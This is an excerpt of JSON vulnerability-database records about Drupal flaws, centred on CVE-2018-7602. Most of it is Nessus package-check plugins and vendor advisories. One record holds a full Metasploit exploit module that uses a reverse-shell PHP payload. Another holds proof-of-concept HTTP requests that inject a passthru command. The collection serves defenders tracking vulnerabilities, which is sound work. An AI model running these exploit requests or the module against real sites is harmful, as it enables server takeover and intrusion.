"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 27 : drupal8 (2018-1ba93b3144) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602", "CVE-2018-9861"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-1BA93B3144.NASL", "href": "https://www.tenable.com/plugins/nessus/109705", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-1ba93b3144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109705);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\");\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 27 : drupal8 (2018-1ba93b3144) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-1ba93b3144\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"drupal8-8.4.8-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:34", "description": "Updated drupal packages fix security vulnerabilities :\n\nDrupal core's text filtering system provides several features including removing inappropriate HTML tags and automatically linking content that appears to be a link. A pattern in Drupal's text matching was found to be inefficient with certain specially crafted strings.\nThis vulnerability is mitigated by the fact that users must have the ability to post content sent to the filter system such as a role with the post comments or Forum topic: Create new content permission (CVE-2012-1588).\n\nDrupal core's Form API allows users to set a destination, but failed to validate that the URL was internal to the site. This weakness could be abused to redirect the login to a remote site with a malicious script that harvests the login credentials and redirects to the live site. This vulnerability is mitigated only by the end user's ability to recognize a URL with malicious query parameters to avoid the social engineering required to exploit the problem (CVE-2012-1589).\n\nDrupal core's forum lists fail to check user access to nodes when displaying them in the forum overview page. If an unpublished node was the most recently updated in a forum then users who should not have access to unpublished forum posts were still be able to see meta-data about the forum post such as the post title (CVE-2012-1590).\n\nDrupal core provides the ability to have private files, including images, and Image Styles which create derivative images from an original image that may differ, for example, in size or saturation.\nDrupal core failed to properly terminate the page request for cached image styles allowing users to access image derivatives for images they should not be able to view. Furthermore, Drupal didn't set the right headers to prevent image styles from being cached in the browser (CVE-2012-1591).\n\nDrupal core provides the ability to list nodes on a site at admin/content. Drupal core failed to confirm a user viewing that page had access to each node in the list. This vulnerability only concerns sites running a contributed node access module and is mitigated by the fact that users must have a role with the Access the content overview page permission. Unpublished nodes were not displayed to users who only had the Access the content overview page permission (CVE-2012-2153).\n\nThe request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message (CVE-2012-2922).\n\nA bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server (Drupal SA-CORE-2012-003).\n\nFor sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server (Drupal SA-CORE-2012-003).\n\nA vulnerability was identified that allows blocked users to appear in user search results, even when the search results are viewed by unprivileged users (CVE-2012-5651).\n\nDrupal core's file upload feature blocks the upload of many files that can be executed on the server by munging the filename. A malicious user could name a file in a manner that bypasses this munging of the filename in Drupal's input validation (CVE-2012-5653).\n\nMultiple vulnerabilities were fixed in the supported Drupal core version 7 (DRUPAL-SA-CORE-2013-001).\n\nA reflected cross-site scripting vulnerability (XSS) was identified in certain Drupal JavaScript functions that pass unexpected user input into jQuery causing it to insert HTML into the page when the intended behavior is to select DOM elements. Multiple core and contributed modules are affected by this issue.\n\nA vulnerability was identified that exposes the title or, in some cases, the content of nodes that the user should not have access to.\n\nDrupal core provides the ability to have private files, including images. A vulnerability was identified in which derivative images (which Drupal automatically creates from these images based on image styles and which may differ, for example, in size or saturation) did not always receive the same protection. Under some circumstances, this would allow users to access image derivatives for images they should not be able to view.\n\nThe drupal package was updated to latest version 7.19 to fix above vulnerabilities.", "cvss3": {}, "published": "2013-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : drupal (MDVSA-2013:074)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1588", "CVE-2012-1589", "CVE-2012-1590", "CVE-2012-1591", "CVE-2012-2153", "CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5653"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:drupal", "p-cpe:/a:mandriva:linux:drupal-mysql", "p-cpe:/a:mandriva:linux:drupal-postgresql", "p-cpe:/a:mandriva:linux:drupal-sqlite", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-074.NASL", "href": "https://www.tenable.com/plugins/nessus/66088", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:074. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66088);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2012-1588\",\n \"CVE-2012-1589\",\n \"CVE-2012-1590\",\n \"CVE-2012-1591\",\n \"CVE-2012-2153\",\n \"CVE-2012-2922\",\n \"CVE-2012-5651\",\n \"CVE-2012-5653\"\n );\n script_bugtraq_id(\n 53359,\n 53362,\n 53365,\n 53368,\n 53454,\n 56993\n );\n script_xref(name:\"MDVSA\", value:\"2013:074\");\n script_xref(name:\"MGASA\", value:\"2012-0320\");\n script_xref(name:\"MGASA\", value:\"2012-0366\");\n script_xref(name:\"MGASA\", value:\"2013-0027\");\n\n script_name(english:\"Mandriva Linux Security Advisory : drupal (MDVSA-2013:074)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated drupal packages fix security vulnerabilities :\n\nDrupal core's text filtering system provides several features\nincluding removing inappropriate HTML tags and automatically linking\ncontent that appears to be a link. A pattern in Drupal's text matching\nwas found to be inefficient with certain specially crafted strings.\nThis vulnerability is mitigated by the fact that users must have the\nability to post content sent to the filter system such as a role with\nthe post comments or Forum topic: Create new content permission\n(CVE-2012-1588).\n\nDrupal core's Form API allows users to set a destination, but failed\nto validate that the URL was internal to the site. This weakness could\nbe abused to redirect the login to a remote site with a malicious\nscript that harvests the login credentials and redirects to the live\nsite. This vulnerability is mitigated only by the end user's ability\nto recognize a URL with malicious query parameters to avoid the social\nengineering required to exploit the problem (CVE-2012-1589).\n\nDrupal core's forum lists fail to check user access to nodes when\ndisplaying them in the forum overview page. If an unpublished node was\nthe most recently updated in a forum then users who should not have\naccess to unpublished forum posts were still be able to see meta-data\nabout the forum post such as the post title (CVE-2012-1590).\n\nDrupal core provides the ability to have private files, including\nimages, and Image Styles which create derivative images from an\noriginal image that may differ, for example, in size or saturation.\nDrupal core failed to properly terminate the page request for cached\nimage styles allowing users to access image derivatives for images\nthey should not be able to view. Furthermore, Drupal didn't set the\nright headers to prevent image styles from being cached in the browser\n(CVE-2012-1591).\n\nDrupal core provides the ability to list nodes on a site at\nadmin/content. Drupal core failed to confirm a user viewing that page\nhad access to each node in the list. This vulnerability only concerns\nsites running a contributed node access module and is mitigated by the\nfact that users must have a role with the Access the content overview\npage permission. Unpublished nodes were not displayed to users who\nonly had the Access the content overview page permission\n(CVE-2012-2153).\n\nThe request_path function in includes/bootstrap.inc in Drupal 7.14 and\nearlier allows remote attackers to obtain sensitive information via\nthe q[] parameter to index.php, which reveals the installation path in\nan error message (CVE-2012-2922).\n\nA bug in the installer code was identified that allows an attacker to\nre-install Drupal using an external database server under certain\ntransient conditions. This could allow the attacker to execute\narbitrary PHP code on the original server (Drupal SA-CORE-2012-003).\n\nFor sites using the core OpenID module, an information disclosure\nvulnerability was identified that allows an attacker to read files on\nthe local filesystem by attempting to log in to the site using a\nmalicious OpenID server (Drupal SA-CORE-2012-003).\n\nA vulnerability was identified that allows blocked users to appear in\nuser search results, even when the search results are viewed by\nunprivileged users (CVE-2012-5651).\n\nDrupal core's file upload feature blocks the upload of many files that\ncan be executed on the server by munging the filename. A malicious\nuser could name a file in a manner that bypasses this munging of the\nfilename in Drupal's input validation (CVE-2012-5653).\n\nMultiple vulnerabilities were fixed in the supported Drupal core\nversion 7 (DRUPAL-SA-CORE-2013-001).\n\nA reflected cross-site scripting vulnerability (XSS) was identified in\ncertain Drupal JavaScript functions that pass unexpected user input\ninto jQuery causing it to insert HTML into the page when the intended\nbehavior is to select DOM elements. Multiple core and contributed\nmodules are affected by this issue.\n\nA vulnerability was identified that exposes the title or, in some\ncases, the content of nodes that the user should not have access to.\n\nDrupal core provides the ability to have private files, including\nimages. A vulnerability was identified in which derivative images\n(which Drupal automatically creates from these images based on image\nstyles and which may differ, for example, in size or saturation) did\nnot always receive the same protection. Under some circumstances, this\nwould allow users to access image derivatives for images they should\nnot be able to view.\n\nThe drupal package was updated to latest version 7.19 to fix above\nvulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-mysql-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-postgresql-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-sqlite-7.19-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-004 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-08T00:00:00", "id": "E-637", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2021-08-26T18:03:02", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Updated \u2014 this vulnerability is being exploited in the wild. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "drupal", "title": "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004\n", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "DRUPAL-SA-CORE-2018-004", "href": "https://www.drupal.org/sa-core-2018-004", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-30T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EXPLOITPACK:42663502F37846690238B2F6EAF79B4A", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon3',\n 'Description' => %q{\n CVE-2018-7602 / SA-CORE-2018-004\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\n Which could result in the site being compromised.\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SixP4ck3r', # Research and port to MSF\n 'Blaklis' # Initial PoC\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-004'],\n ['CVE', '2018-7602'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 29 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def start_exploit\n drupal_node = datastore['DRUPAL_NODE']\n res = send_request_cgi({\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'method' => 'GET',\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\n })\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form -> #{form_token}\\n\"\n r2 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\n 'vars_post' => {\n 'form_id' => 'node_delete_confirm',\n '_triggering_element_name' => 'form_id',\n 'form_token'=> \"#{form_token}\"\n }\n })\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\n r3 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\n 'vars_post' => {\n 'form_build_id' => \"#{form_build_id}\"\n }\n })\n end\n \n def exploit\n case datastore['TARGET']\n when 0\n start_exploit\n else\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EXPLOITPACK:08FA21237E28AF0AAD1F202F20D414F2", "href": "", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\n\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\n\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\n[...]\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\n\nRetrieve the form_build_id from the response, and then triggering the exploit with : \n\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\n[...]\nform_build_id=[FORM_BUILD_ID]\n\nThis will display the result of the whoami command.\n\nPatch your systems!\nBlaklis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-22T12:54:30", "description": "Package : drupal7\nVersion : 7.14-2+deb7u19\nCVE ID : CVE-2018-7602\nDebian Bug : 895778\n\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T09:28:04", "type": "debian", "title": "[SECURITY] [DLA 1365-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 